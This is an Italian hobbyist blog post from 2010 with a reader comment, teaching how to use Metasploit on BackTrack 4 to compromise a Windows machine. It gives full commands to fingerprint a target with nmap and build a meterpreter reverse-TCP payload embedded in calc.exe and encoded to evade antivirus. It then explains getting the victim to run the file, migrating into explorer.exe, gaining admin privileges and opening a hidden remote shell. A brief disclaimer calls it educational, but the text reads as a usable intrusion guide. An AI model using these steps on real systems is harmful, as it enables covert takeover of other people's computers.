domenica 10 ottobre 2010

SICUREZZA:utilizzare un exploit(MSF)


Nel precedente articolo(SICUREZZA:exploits e payloads) ho spiegato cosa sono gli exploit e
cosa sono i payloads.(Finalmente ho trovato un po di tempo per scrivere la guida...ahhh la scuola!)



Ricapitoliamo velocemente:

-Exploit:codice che sfrutta una vulnerabilità di un sistema.
-Payload:il dato o l'insieme di dati che si manda al programma/bersaglio vulnerabile.
In questa guida vorrei spiegarvi come utilizzare un exploit e un payload,utilizzando backtrack 4 e metasploit framework(MSF).




Cosa è metasploit?
Metasploit è un progetto che riguarda la sicurezza informatica e permette di essere sempre aggiornati sulle ultime vulnerabilità;permette anche di effettuare dei "test" con il suo framework.Disponibile per (Linux/Mac/Windows)
Il framework di metasploit è disponibile in:

-CONSOLE:utillizzabile in riga di comando.
-WEB:utilizzabile in una comodissima interfaccia(grafica) web.
-GUI(Graphic User Interface):comoda interfaccia grafica.

In questa guida utilizzeremo la CONSOLE.
Ricordate che per chi usa backtrack 4 metasploit è pre-installato.

ATTENZIONE!L'AUTORE DELLA GUIDA(GHEBBO_HCK) NON SI ASSUNE NESSUNA RESPONSABILITA' DELL'USO INAPPROPRIATO DELLE INFORMAZIONI QUI CONTENUTE.
LA GUIDA HA UNO SCOPO ESCUSIVAMENTE INFORMATIVO/DIDATTICO.
 
Apriamo la konsole e digitiamo:

msfconsole

Così facendo apriamo la console di metasploit framework.
Ora apriamo un'altra konsole e dgitiamo:


nmap -O <indirizzo_ip_bersaglio_locale_es.192.168.0.2>


lasciamo lavorare nmap....ma cosa sta facendo?


nmap è l'applicazione:uno sniffer* di pacchetti
-O è l'opzione di nmap che permette di identificare il SO** del bersaglio
<indirizzo_ip_bersagio_locale_...> è l'indirizzo ip del bersaglio(che deve essere sulla nostra rete)

Appena finito verifichiamo il SO** del bersaglio(questa procedura serve se NON si conosce il SO** del bersaglio).
Dovrebbe esserci scritto:

Running:MIcrosoft Windows SP2/SP3/Vista/7    (o cose molto simili =) )
OS details:Microsoft Windows SP2/SP3/VISTA/7 (o cose simili =) )
Service Info: OS :Windows

*Sniffer:un'applicazone che "cattura" tutti i pacchetti inviati e ricevuti dal computer "target"
**OS:Operating System(=Sistema Operativo)

Ora iniziamo a configurare il nostro exploit =).
Dovremmo avere una schermata simile davanti:



Ora digitiamo:



Dove:

use multi/handler serve a "selezionare" l'exploit da usare(multi/handler in questo caso)
set payload windows/meterpreter/reverse_tcp serve a "selezionare" il payload da usare
show options serve a visualizzare le opzioni dell'exploit/payload

Infine non ci rimane che "riempire" l'opzione LHOST* e avviare =) :


set LHOST 192.168.0.9 serve ad impostare il NOSTRO(192.168.0.9 è solo un esempio:mettete il vostro)indirizzo IP locale
exploit serve ad avviare l'exploit(già,proprio così)

*LHOST:LocalHost,il nostro computer.

Ora però ci manca la parte "fondamentale": l'eseguibile che permetterà al nostro computer di accedere al computer del bersaglio!

Apriamo una nuova konsole e digitiamo:

./msfpayload <percorso_payload(es.windows/meterpreter/reverse_tcp)> LHOST=<il_nostro_ip_locale> R | ./msfencode -t exe -x <percorso_file_da_"infettare"(es.root/calc.exe)> -k -o <output_file_name(es.calcolator)>  -e  x86/shikata_ga_nai -c 5

se vogliamo inserire il "codice malevolo" dentro un eseguibile già esistente,oppure:

./msfpayload <percorso_payload(es.windows/meterpreter/reverse_tcp)> LHOST=<il_nostro_ip_locale> X > E

e poi:

./msfcli <percorso_exploit(es.multi/handler)> payload=<percorso_payload (es.windows/meterpreter/reverse_tcp)> LHOST=<il_nostro_ip_locale> E

se vogliamo creare un eseguibile con dentro il codice malevolo:l'eseguibile non avvierà nessun applicativo,quindi è meno consigliabile da usare =).

Ora,appena finito di creare il file eseguibile(o di inserire il codice dentro un eseguibile già esistente) non ci rimane che far avviare alla vittima il nostro eseguibile,appena fatto ciò,torniamo alla konsole con metasploit framework aperto(quella con msfconsole).
Vedremo una cosa del genere:


Bene,ora siamo ufficialmente dentro il computer della vittima!
Ora vi illustrerò alcune potenzialità di meterpreter(il payload da noi utilizzato):


Ok,iniziamo la spiegazione!

run migrate explorer.exe è lo script che permette di "migrare" il nostro processo(quello del nostro file eseguibile) dentro un'altro processo,in questo caso "explorer.exe"...così facendo evitiamo il pericolo di perdere la connessione appena il nostro processo viene terminato.
getprivs serve ad ottenere i privilegi di amministratore
shell serve ad avviare una shell(ma va?) in remoto e in background(non visibile dall'utente).

Come sempre,se ho commesso qualche errore fatemelo notare:correggerò subito!
Spero vi sia stato utile,alla prossima =)!

2 commenti:

  1. per ubuntu cambiano 2 cose:
    Al posto di "msfconsole" si deve mettere "sudo msfconsole"

    e basta fare:
    "cd /opt/framework-3.5.1/msf3" appena si è aperta la console di metasploit :D in questo modo si ottiene ciò che fà in automatico back track ;)

    RispondiElimina